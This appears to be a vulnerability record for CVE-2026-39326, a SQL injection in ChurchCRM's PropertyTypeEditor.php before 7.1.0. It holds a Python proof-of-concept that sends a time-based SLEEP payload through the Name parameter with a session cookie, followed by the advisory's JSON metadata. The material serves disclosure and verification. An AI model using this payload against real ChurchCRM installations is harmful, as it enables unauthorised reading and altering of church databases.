CVE-2026-39326

import requests def verify_sqli(target_url, session_cookie): """ Proof of Concept for CVE-2026-39326 This script exploits the SQL injection in PropertyTypeEditor.php via the 'Name' parameter. """ # Target endpoint endpoint = target_url + "/PropertyTypeEditor.php" # Headers including session cookie for authentication headers = { "Cookie": session_cookie, "Content-Type": "application/x-www-form-urlencoded" } # Payload to test SQL injection (Time-based) # Attempting to inject a single quote to break the query and add a sleep command payload = "' AND SLEEP(5)-- -" # Data to be sent in the POST request data = { "Name": payload, "Description": "Test Description", "Action": "Add" # Assuming 'Add' is a valid action, might vary by version } try: print(f"[*] Sending payload to {endpoint}...") response = requests.post(endpoint, headers=headers, data=data, timeout=10) # Check if the request took longer than expected (indicating SLEEP(5) executed) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed! Server response delayed.") else: print("[-] Vulnerability not confirmed or payload incorrect.") except requests.RequestException as e: print(f"[!] Error during request: {e}") if __name__ == "__main__": # Example usage target = "http://localhost" # Replace with actual target cookie = "PHPSESSID=attacker_session_id" # Replace with valid authenticated session verify_sqli(target, cookie)

{"cve": {"id": "CVE-2026-39326", "sourceIdentifier": "[email protected]", "published": "2026-04-07T18:16:43.690", "lastModified": "2026-04-10T20:58:33.240", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. Prior to 7.1.0, an SQL injection vulnerability was found in the endpoint /PropertyTypeEditor.php in ChurchCRM. Authenticated users with the role isMenuOptionsEnabled can inject arbitrary SQL statements through the Name and Description parameters and thus extract and modify information from the database. This vulnerability is fixed in 7.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.1.0", "matchCriteriaId": "BF846F61-0C1E-49AB-B691-A01937A6C24D"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-mch7-6v8f-c4j5", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-mch7-6v8f-c4j5", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}